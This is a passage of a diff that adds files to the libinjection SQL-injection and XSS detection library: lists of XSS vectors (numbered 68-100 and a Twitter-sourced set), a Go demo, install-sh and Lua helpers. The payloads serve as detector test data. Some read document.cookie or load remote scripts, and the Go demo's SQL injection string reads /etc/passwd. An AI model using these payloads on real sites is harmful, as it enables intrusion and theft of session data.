||||
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
|
||||
69) <svg><script ?>alert(1)
|
||||
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
71) <img src=`xx:xx`onerror=alert(1)>
|
||||
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
|
||||
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
||||
76) <svg contentScriptType=text/vbs><script>MsgBox+1
|
||||
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
|
||||
82) <object data=javascript:\u0061le%72t(1)>
|
||||
83) <script>+-+-1-+-+alert(1)</script>
|
||||
84) <body/onload=<!-->
alert(1)>
|
||||
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
|
||||
86) <img src ?itworksonchrome?\/onerror = alert(1)
|
||||
87) <svg><script>//
confirm(1);</script </svg>
|
||||
88) <svg><script onlypossibleinopera:-)> alert(1)
|
||||
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
90) <script x> alert(1) </script 1=2
|
||||
91) <div/onmouseover='alert(1)'> style="x:">
|
||||
# unable to reproduce in IE8 or IE9
|
||||
#92) <--`<img/src=` onerror=alert(1)> --!>
|
||||
93) <script/src=data:text/javascript,alert(1)></script>
|
||||
94) <div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)" onclick="alert(1)">x</button>
|
||||
95) "><img src=x onerror=window.open('https://www.google.com/');>
|
||||
96) <form><button formaction=javascript:alert(1)>CLICKME
|
||||
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
|
||||
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
57
libinjection/data/xss-soaj1664ashar.txt
Normal file
57
libinjection/data/xss-soaj1664ashar.txt
Normal file
|
@ -0,0 +1,57 @@
|
|||
#
|
||||
# Misc XSS awesomeness from soaj1664ashar feed
|
||||
# https://twitter.com/soaj1664ashar
|
||||
#
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/424961050258063360
|
||||
# 2:46 AM - 20 Jan 2014
|
||||
<iframe/onload=action=/confir/.source+'m';eval(action)(1)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/418454103895728128
|
||||
# 3:50 AM - 2 Jan 2014
|
||||
<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->
|
||||
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/418163175788265472/
|
||||
# 8:34 AM - 1 Jan 2014 :-)
|
||||
><img src=http://i.imgur.com/ISxZ5dd.jpg onmouseover=confirm(/Happy_New_Year_2014/)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/416613093490163712
|
||||
# Dec 28, 2013
|
||||
# appears to be specific for a sanitization filter which alters the input
|
||||
# into an XSS-able form.
|
||||
#<form/action=ja	vascr	ipt:confirm(document.cookie)> <button/type=submit>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/407438076118462464
|
||||
# 6:16 PM - 2 Dec 2013
|
||||
<style/onload = !-alert(1)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/407086397493747712
|
||||
# Dec 1, 2013
|
||||
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400335443805237248
|
||||
# not sure who is author
|
||||
# FF specific bug
|
||||
# Nov 13, 2013
|
||||
<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+" style="FONT-SIZE: 1000pt; FONT-FAMILY: Comic Sans MS; position:absolute;top:0;left:0;width:1000;height:1000;opacity:0">ClickMe</a>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400257634449637376
|
||||
<svg><;(noitacol)mrifnoc=daolno ;howthehellitworks`=wtf>`
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400257634449637376
|
||||
# http://jsfiddle.net/DH8wM/10/
|
||||
<svg><GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/396307604734881792
|
||||
"><img src=x onerror=confirm(1);>
|
||||
#"><img src=x onerror=confirm(1);>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/385461391366168576
|
||||
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/367350377894518784
|
||||
# http://pastebin.com/TVH8t5bQ
|
||||
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(document.cookie)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http://i.imgur.com/P8mL8.jpg">
|
||||
|
||||
# If a site has length restriction on input field then use chunk of your choice from the above vector :P
|
1204
libinjection/data/xss-xenotix.txt
Normal file
1204
libinjection/data/xss-xenotix.txt
Normal file
File diff suppressed because it is too large
Load diff
33
libinjection/go/main.go
Normal file
33
libinjection/go/main.go
Normal file
|
@ -0,0 +1,33 @@
|
|||
/*
|
||||
* Copyright (c) 2013 Radolsaw Wesolowski
|
||||
*
|
||||
* Permission to use, copy, modify, and distribute this software for any
|
||||
* purpose with or without fee is hereby granted, provided that the above
|
||||
* copyright notice and this permission notice appear in all copies.
|
||||
*
|
||||
*/
|
||||
|
||||
package main
|
||||
|
||||
/*
|
||||
#cgo CFLAGS: -I./libinjection
|
||||
#cgo LDFLAGS: -L./libinjection -linjection
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
*/
|
||||
import "C"
|
||||
import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"unsafe"
|
||||
)
|
||||
|
||||
func main() {
|
||||
sqlinjection := "asdf asd ; -1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
|
||||
var out [8]C.char
|
||||
pointer := (*C.char)(unsafe.Pointer(&out[0]))
|
||||
if found := C.libinjection_sqli(C.CString(sqlinjection), C.size_t(len(sqlinjection)), pointer); found == 1 {
|
||||
output := C.GoBytes(unsafe.Pointer(&out[0]), 8)
|
||||
fmt.Printf("sqli with fingerprint of '%s'\n", string(output[:bytes.Index(output, []byte{0})]))
|
||||
}
|
||||
}
|
527
libinjection/install-sh
Executable file
527
libinjection/install-sh
Executable file
|
@ -0,0 +1,527 @@
|
|||
#!/bin/sh
|
||||
# install - install a program, script, or datafile
|
||||
|
||||
scriptversion=2011-11-20.07; # UTC
|
||||
|
||||
# This originates from X11R5 (mit/util/scripts/install.sh), which was
|
||||
# later released in X11R6 (xc/config/util/install.sh) with the
|
||||
# following copyright and license.
|
||||
#
|
||||
# Copyright (C) 1994 X Consortium
|
||||
#
|
||||
# Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
# of this software and associated documentation files (the "Software"), to
|
||||
# deal in the Software without restriction, including without limitation the
|
||||
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
|
||||
# sell copies of the Software, and to permit persons to whom the Software is
|
||||
# furnished to do so, subject to the following conditions:
|
||||
#
|
||||
# The above copyright notice and this permission notice shall be included in
|
||||
# all copies or substantial portions of the Software.
|
||||
#
|
||||
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
# X CONSORTIUM BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
|
||||
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNEC-
|
||||
# TION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
||||
#
|
||||
# Except as contained in this notice, the name of the X Consortium shall not
|
||||
# be used in advertising or otherwise to promote the sale, use or other deal-
|
||||
# ings in this Software without prior written authorization from the X Consor-
|
||||
# tium.
|
||||
#
|
||||
#
|
||||
# FSF changes to this file are in the public domain.
|
||||
#
|
||||
# Calling this script install-sh is preferred over install.sh, to prevent
|
||||
# 'make' implicit rules from creating a file called install from it
|
||||
# when there is no Makefile.
|
||||
#
|
||||
# This script is compatible with the BSD install script, but was written
|
||||
# from scratch.
|
||||
|
||||
nl='
|
||||
'
|
||||
IFS=" "" $nl"
|
||||
|
||||
# set DOITPROG to echo to test this script
|
||||
|
||||
# Don't use :- since 4.3BSD and earlier shells don't like it.
|
||||
doit=${DOITPROG-}
|
||||
if test -z "$doit"; then
|
||||
doit_exec=exec
|
||||
else
|
||||
doit_exec=$doit
|
||||
fi
|
||||
|
||||
# Put in absolute file names if you don't have them in your path;
|
||||
# or use environment vars.
|
||||
|
||||
chgrpprog=${CHGRPPROG-chgrp}
|
||||
chmodprog=${CHMODPROG-chmod}
|
||||
chownprog=${CHOWNPROG-chown}
|
||||
cmpprog=${CMPPROG-cmp}
|
||||
cpprog=${CPPROG-cp}
|
||||
mkdirprog=${MKDIRPROG-mkdir}
|
||||
mvprog=${MVPROG-mv}
|
||||
rmprog=${RMPROG-rm}
|
||||
stripprog=${STRIPPROG-strip}
|
||||
|
||||
posix_glob='?'
|
||||
initialize_posix_glob='
|
||||
test "$posix_glob" != "?" || {
|
||||
if (set -f) 2>/dev/null; then
|
||||
posix_glob=
|
||||
else
|
||||
posix_glob=:
|
||||
fi
|
||||
}
|
||||
'
|
||||
|
||||
posix_mkdir=
|
||||
|
||||
# Desired mode of installed file.
|
||||
mode=0755
|
||||
|
||||
chgrpcmd=
|
||||
chmodcmd=$chmodprog
|
||||
chowncmd=
|
||||
mvcmd=$mvprog
|
||||
rmcmd="$rmprog -f"
|
||||
stripcmd=
|
||||
|
||||
src=
|
||||
dst=
|
||||
dir_arg=
|
||||
dst_arg=
|
||||
|
||||
copy_on_change=false
|
||||
no_target_directory=
|
||||
|
||||
usage="\
|
||||
Usage: $0 [OPTION]... [-T] SRCFILE DSTFILE
|
||||
or: $0 [OPTION]... SRCFILES... DIRECTORY
|
||||
or: $0 [OPTION]... -t DIRECTORY SRCFILES...
|
||||
or: $0 [OPTION]... -d DIRECTORIES...
|
||||
|
||||
In the 1st form, copy SRCFILE to DSTFILE.
|
||||
In the 2nd and 3rd, copy all SRCFILES to DIRECTORY.
|
||||
In the 4th, create DIRECTORIES.
|
||||
|
||||
Options:
|
||||
--help display this help and exit.
|
||||
--version display version info and exit.
|
||||
|
||||
-c (ignored)
|
||||
-C install only if different (preserve the last data modification time)
|
||||
-d create directories instead of installing files.
|
||||
-g GROUP $chgrpprog installed files to GROUP.
|
||||
-m MODE $chmodprog installed files to MODE.
|
||||
-o USER $chownprog installed files to USER.
|
||||
-s $stripprog installed files.
|
||||
-t DIRECTORY install into DIRECTORY.
|
||||
-T report an error if DSTFILE is a directory.
|
||||
|
||||
Environment variables override the default commands:
|
||||
CHGRPPROG CHMODPROG CHOWNPROG CMPPROG CPPROG MKDIRPROG MVPROG
|
||||
RMPROG STRIPPROG
|
||||
"
|
||||
|
||||
while test $# -ne 0; do
|
||||
case $1 in
|
||||
-c) ;;
|
||||
|
||||
-C) copy_on_change=true;;
|
||||
|
||||
-d) dir_arg=true;;
|
||||
|
||||
-g) chgrpcmd="$chgrpprog $2"
|
||||
shift;;
|
||||
|
||||
--help) echo "$usage"; exit $?;;
|
||||
|
||||
-m) mode=$2
|
||||
case $mode in
|
||||
*' '* | *' '* | *'
|
||||
'* | *'*'* | *'?'* | *'['*)
|
||||
echo "$0: invalid mode: $mode" >&2
|
||||
exit 1;;
|
||||
esac
|
||||
shift;;
|
||||
|
||||
-o) chowncmd="$chownprog $2"
|
||||
shift;;
|
||||
|
||||
-s) stripcmd=$stripprog;;
|
||||
|
||||
-t) dst_arg=$2
|
||||
# Protect names problematic for 'test' and other utilities.
|
||||
case $dst_arg in
|
||||
-* | [=\(\)!]) dst_arg=./$dst_arg;;
|
||||
esac
|
||||
shift;;
|
||||
|
||||
-T) no_target_directory=true;;
|
||||
|
||||
--version) echo "$0 $scriptversion"; exit $?;;
|
||||
|
||||
--) shift
|
||||
break;;
|
||||
|
||||
-*) echo "$0: invalid option: $1" >&2
|
||||
exit 1;;
|
||||
|
||||
*) break;;
|
||||
esac
|
||||
shift
|
||||
done
|
||||
|
||||
if test $# -ne 0 && test -z "$dir_arg$dst_arg"; then
|
||||
# When -d is used, all remaining arguments are directories to create.
|
||||
# When -t is used, the destination is already specified.
|
||||
# Otherwise, the last argument is the destination. Remove it from $@.
|
||||
for arg
|
||||
do
|
||||
if test -n "$dst_arg"; then
|
||||
# $@ is not empty: it contains at least $arg.
|
||||
set fnord "$@" "$dst_arg"
|
||||
shift # fnord
|
||||
fi
|
||||
shift # arg
|
||||
dst_arg=$arg
|
||||
# Protect names problematic for 'test' and other utilities.
|
||||
case $dst_arg in
|
||||
-* | [=\(\)!]) dst_arg=./$dst_arg;;
|
||||
esac
|
||||
done
|
||||
fi
|
||||
|
||||
if test $# -eq 0; then
|
||||
if test -z "$dir_arg"; then
|
||||
echo "$0: no input file specified." >&2
|
||||
exit 1
|
||||
fi
|
||||
# It's OK to call 'install-sh -d' without argument.
|
||||
# This can happen when creating conditional directories.
|
||||
exit 0
|
||||
fi
|
||||
|
||||
if test -z "$dir_arg"; then
|
||||
do_exit='(exit $ret); exit $ret'
|
||||
trap "ret=129; $do_exit" 1
|
||||
trap "ret=130; $do_exit" 2
|
||||
trap "ret=141; $do_exit" 13
|
||||
trap "ret=143; $do_exit" 15
|
||||
|
||||
# Set umask so as not to create temps with too-generous modes.
|
||||
# However, 'strip' requires both read and write access to temps.
|
||||
case $mode in
|
||||
# Optimize common cases.
|
||||
*644) cp_umask=133;;
|
||||
*755) cp_umask=22;;
|
||||
|
||||
*[0-7])
|
||||
if test -z "$stripcmd"; then
|
||||
u_plus_rw=
|
||||
else
|
||||
u_plus_rw='% 200'
|
||||
fi
|
||||
cp_umask=`expr '(' 777 - $mode % 1000 ')' $u_plus_rw`;;
|
||||
*)
|
||||
if test -z "$stripcmd"; then
|
||||
u_plus_rw=
|
||||
else
|
||||
u_plus_rw=,u+rw
|
||||
fi
|
||||
cp_umask=$mode$u_plus_rw;;
|
||||
esac
|
||||
fi
|
||||
|
||||
for src
|
||||
do
|
||||
# Protect names problematic for 'test' and other utilities.
|
||||
case $src in
|
||||
-* | [=\(\)!]) src=./$src;;
|
||||
esac
|
||||
|
||||
if test -n "$dir_arg"; then
|
||||
dst=$src
|
||||
dstdir=$dst
|
||||
test -d "$dstdir"
|
||||
dstdir_status=$?
|
||||
else
|
||||
|
||||
# Waiting for this to be detected by the "$cpprog $src $dsttmp" command
|
||||
# might cause directories to be created, which would be especially bad
|
||||
# if $src (and thus $dsttmp) contains '*'.
|
||||
if test ! -f "$src" && test ! -d "$src"; then
|
||||
echo "$0: $src does not exist." >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if test -z "$dst_arg"; then
|
||||
echo "$0: no destination specified." >&2
|
||||
exit 1
|
||||
fi
|
||||
dst=$dst_arg
|
||||
|
||||
# If destination is a directory, append the input filename; won't work
|
||||
# if double slashes aren't ignored.
|
||||
if test -d "$dst"; then
|
||||
if test -n "$no_target_directory"; then
|
||||
echo "$0: $dst_arg: Is a directory" >&2
|
||||
exit 1
|
||||
fi
|
||||
dstdir=$dst
|
||||
dst=$dstdir/`basename "$src"`
|
||||
dstdir_status=0
|
||||
else
|
||||
# Prefer dirname, but fall back on a substitute if dirname fails.
|
||||
dstdir=`
|
||||
(dirname "$dst") 2>/dev/null ||
|
||||
expr X"$dst" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \
|
||||
X"$dst" : 'X\(//\)[^/]' \| \
|
||||
X"$dst" : 'X\(//\)$' \| \
|
||||
X"$dst" : 'X\(/\)' \| . 2>/dev/null ||
|
||||
echo X"$dst" |
|
||||
sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{
|
||||
s//\1/
|
||||
q
|
||||
}
|
||||
/^X\(\/\/\)[^/].*/{
|
||||
s//\1/
|
||||
q
|
||||
}
|
||||
/^X\(\/\/\)$/{
|
||||
s//\1/
|
||||
q
|
||||
}
|
||||
/^X\(\/\).*/{
|
||||
s//\1/
|
||||
q
|
||||
}
|
||||
s/.*/./; q'
|
||||
`
|
||||
|
||||
test -d "$dstdir"
|
||||
dstdir_status=$?
|
||||
fi
|
||||
fi
|
||||
|
||||
obsolete_mkdir_used=false
|
||||
|
||||
if test $dstdir_status != 0; then
|
||||
case $posix_mkdir in
|
||||
'')
|
||||
# Create intermediate dirs using mode 755 as modified by the umask.
|
||||
# This is like FreeBSD 'install' as of 1997-10-28.
|
||||
umask=`umask`
|
||||
case $stripcmd.$umask in
|
||||
# Optimize common cases.
|
||||
*[2367][2367]) mkdir_umask=$umask;;
|
||||
.*0[02][02] | .[02][02] | .[02]) mkdir_umask=22;;
|
||||
|
||||
*[0-7])
|
||||
mkdir_umask=`expr $umask + 22 \
|
||||
- $umask % 100 % 40 + $umask % 20 \
|
||||
- $umask % 10 % 4 + $umask % 2
|
||||
`;;
|
||||
*) mkdir_umask=$umask,go-w;;
|
||||
esac
|
||||
|
||||
# With -d, create the new directory with the user-specified mode.
|
||||
# Otherwise, rely on $mkdir_umask.
|
||||
if test -n "$dir_arg"; then
|
||||
mkdir_mode=-m$mode
|
||||
else
|
||||
mkdir_mode=
|
||||
fi
|
||||
|
||||
posix_mkdir=false
|
||||
case $umask in
|
||||
*[123567][0-7][0-7])
|
||||
# POSIX mkdir -p sets u+wx bits regardless of umask, which
|
||||
# is incompatible with FreeBSD 'install' when (umask & 300) != 0.
|
||||
;;
|
||||
*)
|
||||
tmpdir=${TMPDIR-/tmp}/ins$RANDOM-$$
|
||||
trap 'ret=$?; rmdir "$tmpdir/d" "$tmpdir" 2>/dev/null; exit $ret' 0
|
||||
|
||||
if (umask $mkdir_umask &&
|
||||
exec $mkdirprog $mkdir_mode -p -- "$tmpdir/d") >/dev/null 2>&1
|
||||
then
|
||||
if test -z "$dir_arg" || {
|
||||
# Check for POSIX incompatibilities with -m.
|
||||
# HP-UX 11.23 and IRIX 6.5 mkdir -m -p sets group- or
|
||||
# other-writable bit of parent directory when it shouldn't.
|
||||
# FreeBSD 6.1 mkdir -m -p sets mode of existing directory.
|
||||
ls_ld_tmpdir=`ls -ld "$tmpdir"`
|
||||
case $ls_ld_tmpdir in
|
||||
d????-?r-*) different_mode=700;;
|
||||
d????-?--*) different_mode=755;;
|
||||
*) false;;
|
||||
esac &&
|
||||
$mkdirprog -m$different_mode -p -- "$tmpdir" && {
|
||||
ls_ld_tmpdir_1=`ls -ld "$tmpdir"`
|
||||
test "$ls_ld_tmpdir" = "$ls_ld_tmpdir_1"
|
||||
}
|
||||
}
|
||||
then posix_mkdir=:
|
||||
fi
|
||||
rmdir "$tmpdir/d" "$tmpdir"
|
||||
else
|
||||
# Remove any dirs left behind by ancient mkdir implementations.
|
||||
rmdir ./$mkdir_mode ./-p ./-- 2>/dev/null
|
||||
fi
|
||||
trap '' 0;;
|
||||
esac;;
|
||||
esac
|
||||
|
||||
if
|
||||
$posix_mkdir && (
|
||||
umask $mkdir_umask &&
|
||||
$doit_exec $mkdirprog $mkdir_mode -p -- "$dstdir"
|
||||
)
|
||||
then :
|
||||
else
|
||||
|
||||
# The umask is ridiculous, or mkdir does not conform to POSIX,
|
||||
# or it failed possibly due to a race condition. Create the
|
||||
# directory the slow way, step by step, checking for races as we go.
|
||||
|
||||
case $dstdir in
|
||||
/*) prefix='/';;
|
||||
[-=\(\)!]*) prefix='./';;
|
||||
*) prefix='';;
|
||||
esac
|
||||
|
||||
eval "$initialize_posix_glob"
|
||||
|
||||
oIFS=$IFS
|
||||
IFS=/
|
||||
$posix_glob set -f
|
||||
set fnord $dstdir
|
||||
shift
|
||||
$posix_glob set +f
|
||||
IFS=$oIFS
|
||||
|
||||
prefixes=
|
||||
|
||||
for d
|
||||
do
|
||||
test X"$d" = X && continue
|
||||
|
||||
prefix=$prefix$d
|
||||
if test -d "$prefix"; then
|
||||
prefixes=
|
||||
else
|
||||
if $posix_mkdir; then
|
||||
(umask=$mkdir_umask &&
|
||||
$doit_exec $mkdirprog $mkdir_mode -p -- "$dstdir") && break
|
||||
# Don't fail if two instances are running concurrently.
|
||||
test -d "$prefix" || exit 1
|
||||
else
|
||||
case $prefix in
|
||||
*\'*) qprefix=`echo "$prefix" | sed "s/'/'\\\\\\\\''/g"`;;
|
||||
*) qprefix=$prefix;;
|
||||
esac
|
||||
prefixes="$prefixes '$qprefix'"
|
||||
fi
|
||||
fi
|
||||
prefix=$prefix/
|
||||
done
|
||||
|
||||
if test -n "$prefixes"; then
|
||||
# Don't fail if two instances are running concurrently.
|
||||
(umask $mkdir_umask &&
|
||||
eval "\$doit_exec \$mkdirprog $prefixes") ||
|
||||
test -d "$dstdir" || exit 1
|
||||
obsolete_mkdir_used=true
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
if test -n "$dir_arg"; then
|
||||
{ test -z "$chowncmd" || $doit $chowncmd "$dst"; } &&
|
||||
{ test -z "$chgrpcmd" || $doit $chgrpcmd "$dst"; } &&
|
||||
{ test "$obsolete_mkdir_used$chowncmd$chgrpcmd" = false ||
|
||||
test -z "$chmodcmd" || $doit $chmodcmd $mode "$dst"; } || exit 1
|
||||
else
|
||||
|
||||
# Make a couple of temp file names in the proper directory.
|
||||
dsttmp=$dstdir/_inst.$$_
|
||||
rmtmp=$dstdir/_rm.$$_
|
||||
|
||||
# Trap to clean up those temp files at exit.
|
||||
trap 'ret=$?; rm -f "$dsttmp" "$rmtmp" && exit $ret' 0
|
||||
|
||||
# Copy the file name to the temp name.
|
||||
(umask $cp_umask && $doit_exec $cpprog "$src" "$dsttmp") &&
|
||||
|
||||
# and set any options; do chmod last to preserve setuid bits.
|
||||
#
|
||||
# If any of these fail, we abort the whole thing. If we want to
|
||||
# ignore errors from any of these, just make sure not to ignore
|
||||
# errors from the above "$doit $cpprog $src $dsttmp" command.
|
||||
#
|
||||
{ test -z "$chowncmd" || $doit $chowncmd "$dsttmp"; } &&
|
||||
{ test -z "$chgrpcmd" || $doit $chgrpcmd "$dsttmp"; } &&
|
||||
{ test -z "$stripcmd" || $doit $stripcmd "$dsttmp"; } &&
|
||||
{ test -z "$chmodcmd" || $doit $chmodcmd $mode "$dsttmp"; } &&
|
||||
|
||||
# If -C, don't bother to copy if it wouldn't change the file.
|
||||
if $copy_on_change &&
|
||||
old=`LC_ALL=C ls -dlL "$dst" 2>/dev/null` &&
|
||||
new=`LC_ALL=C ls -dlL "$dsttmp" 2>/dev/null` &&
|
||||
|
||||
eval "$initialize_posix_glob" &&
|
||||
$posix_glob set -f &&
|
||||
set X $old && old=:$2:$4:$5:$6 &&
|
||||
set X $new && new=:$2:$4:$5:$6 &&
|
||||
$posix_glob set +f &&
|
||||
|
||||
test "$old" = "$new" &&
|
||||
$cmpprog "$dst" "$dsttmp" >/dev/null 2>&1
|
||||
then
|
||||
rm -f "$dsttmp"
|
||||
else
|
||||
# Rename the file to the real destination.
|
||||
$doit $mvcmd -f "$dsttmp" "$dst" 2>/dev/null ||
|
||||
|
||||
# The rename failed, perhaps because mv can't rename something else
|
||||
# to itself, or perhaps because mv is so ancient that it does not
|
||||
# support -f.
|
||||
{
|
||||
# Now remove or move aside any old file at destination location.
|
||||
# We try this two ways since rm can't unlink itself on some
|
||||
# systems and the destination file might be busy for other
|
||||
# reasons. In this case, the final cleanup might fail but the new
|
||||
# file should still install successfully.
|
||||
{
|
||||
test ! -f "$dst" ||
|
||||
$doit $rmcmd -f "$dst" 2>/dev/null ||
|
||||
{ $doit $mvcmd -f "$dst" "$rmtmp" 2>/dev/null &&
|
||||
{ $doit $rmcmd -f "$rmtmp" 2>/dev/null; :; }
|
||||
} ||
|
||||
{ echo "$0: cannot unlink or rename $dst" >&2
|
||||
(exit 1); exit 1
|
||||
}
|
||||
} &&
|
||||
|
||||
# Now rename the file to the real destination.
|
||||
$doit $mvcmd "$dsttmp" "$dst"
|
||||
}
|
||||
fi || exit 1
|
||||
|
||||
trap '' 0
|
||||
fi
|
||||
done
|
||||
|
||||
# Local variables:
|
||||
# eval: (add-hook 'write-file-hooks 'time-stamp)
|
||||
# time-stamp-start: "scriptversion="
|
||||
# time-stamp-format: "%:y-%02m-%02d.%02H"
|
||||
# time-stamp-time-zone: "UTC"
|
||||
# time-stamp-end: "; # UTC"
|
||||
# End:
|
1
libinjection/lua/.gitignore
vendored
Normal file
1
libinjection/lua/.gitignore
vendored
Normal file
|
@ -0,0 +1 @@
|
|||
lua-TestMore
|
41
libinjection/lua/data2lua.py
Executable file
41
libinjection/lua/data2lua.py
Executable file
|
@ -0,0 +1,41 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Copyright 2012, 2013 Nick Galbreath
|
||||
# nickg@client9.com
|
||||
# BSD License -- see COPYING.txt for details
|
||||
#
|
||||
|
||||
"""
|
||||
Converts a libinjection JSON data file to a C header (.h) file
|
||||
"""
|
||||
|
||||
def toc(obj):
|
||||
""" main routine """
|
||||
if False:
|
||||
print 'fingerprints = {'
|
||||
for fp in sorted(obj[u'fingerprints']):
|
||||
print "['{0}']='X',".format(fp)
|
||||
print '}'
|
||||
|
||||
words = {}
|
||||
keywords = obj['keywords']
|
||||
|
||||
for k,v in keywords.iteritems():
|
||||
words[str(k)] = str(v)
|
||||
|
||||
for fp in list(obj[u'fingerprints']):
|
||||
fp = '0' + fp.upper()
|
||||
words[str(fp)] = 'F';
|
||||
|
||||
print 'words = {'
|
||||
for k in sorted(words.keys()):
|
||||
#print "['{0}']='{1}',".format(k, words[k])
|
||||
print "['{0}']={1},".format(k, ord(words[k]))
|
||||
print '}'
|
||||
return 0
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
import json
|
||||
sys.exit(toc(json.load(sys.stdin)))
|
||||
|
26
libinjection/lua/generate_lua_fingerprints.py
Executable file
26
libinjection/lua/generate_lua_fingerprints.py
Executable file
|
@ -0,0 +1,26 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Generates a Lua table of fingerprints.
|
||||
One can then add, turn off or delete fingerprints from lua.
|
||||
"""
|
||||
|
||||
def make_lua_table(obj):
|
||||
"""
|
||||
Generates table. Fingerprints don't contain any special chars
|
||||
so they don't need to be escaped. The output may be
|
||||
sorted but it is not required.
|
||||
"""
|
||||
fp = obj[u'fingerprints']
|
||||
print("sqlifingerprints = {")
|
||||
for f in fp:
|
||||
print(' ["{0}"]=true,'.format(f))
|
||||
print("}")
|
||||
return 0
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
import json
|
||||
with open('../c/sqlparse_data.json', 'r') as fd:
|
||||
make_lua_table(json.load(fd))
|
||||
|
62
libinjection/lua/libinjection.i
Normal file
62
libinjection/lua/libinjection.i
Normal file
|
@ -0,0 +1,62 @@
|
|||
/* libinjection.i SWIG interface file */
|
||||
%module libinjection
|
||||
%{
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
|
||||
static char libinjection_lua_lookup_word(sfilter* sf, int lookup_type,
|
||||
const char* s, size_t len)
|
||||
{
|
||||
lua_State* L = (lua_State*) sf->userdata;
|
||||
//char* luafunc = (char *)lua_tostring(L, 2);
|
||||
lua_getglobal(L, "lookup_word");
|
||||
SWIG_NewPointerObj(L, (void*)sf, SWIGTYPE_p_libinjection_sqli_state, 0);
|
||||
lua_pushnumber(L, lookup_type);
|
||||
lua_pushlstring(L, s, len);
|
||||
|
||||
if (lua_pcall(L, 3, 1, 0)) {
|
||||
printf("Something bad happened");
|
||||
}
|
||||
|
||||
const char* result = lua_tostring(L, -1);
|
||||
if (result == NULL) {
|
||||
return 0;
|
||||
} else {
|
||||
return result[0];
|
||||
}
|
||||
}
|
||||
%}
|
||||
%include "typemaps.i"
|
||||
|
||||
|
||||
// The C functions all start with 'libinjection_' as a namespace
|
||||
// We don't need this since it's in the libinjection table
|
||||
// i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli
|
||||
//
|
||||
%rename("%(strip:[libinjection_])s") "";
|
||||
|
||||
%typemap(in) (ptr_lookup_fn fn, void* userdata) {
|
||||
if (lua_isnil(L, 1)) {
|
||||
arg2 = NULL;
|
||||
arg3 = NULL;
|
||||
} else {
|
||||
